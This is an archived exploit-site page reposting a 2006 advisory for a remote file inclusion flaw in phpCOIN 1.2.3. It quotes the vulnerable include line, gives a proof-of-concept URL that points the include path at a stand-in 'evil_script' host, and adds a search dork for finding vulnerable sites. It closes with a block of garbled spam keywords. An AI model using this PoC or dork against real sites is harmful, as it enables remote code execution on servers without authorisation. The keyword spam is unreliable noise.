about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , phpCOIN 1.2.3 (session_set.php) Remote Include Vulnerability



2006-08-24 phpCOIN 1.2.3 (session_set.php) Remote Include Vulnerability 
Rated as : High Risk

phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability

##################################################################

Discovered by: Timq
http://www.securitydb.org
##################################################################

Email: timq[at]hackernetwork[dot]com

http://www.securitydb.org
##################################################################

Vulnerable: require_once include
($_CCFG['_PKG_PATH_INCL'].'redirect.php');

###################################################################

Exploit PoC:

http://www.site.com/[path]/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://evil_script?

Dork: Powered By phpCOIN 1.2.3
####################################################################

Shoutz:
Warpboy,Z66,Gammarays,Archangel,BliTz,Splinter,InTel,ErazerZ,Maggot,PunKerX,Infiltration

#####################################################################
securitydot.net - 2006-08-24

Advertising

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 17:50:29 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
xxxvdo nt-service Ponographi AISHWARIA www89. sex hussam al Girl man s news for c radha kaad news for c news for c 14562 www.129123 Www arab s powerboard Www.karams meer www.SCHOOL www.china. Igre PHP Advanc Wanawap co sex klips www.yykkk. sex www.378q.c lasso SEXY PHOTO www.18to19 www.bebe.c sex klips Www freese dirty sex a.sebang45 Hot Lady narutosexh mambo Remo jiahedyy.c www.18to19 maxcpm.inf www.xiaona smtp excha www.07.ha. www.americ ip board 2 Msn.Com SQuery.htm sexgris Sexywallpa a.mmlian12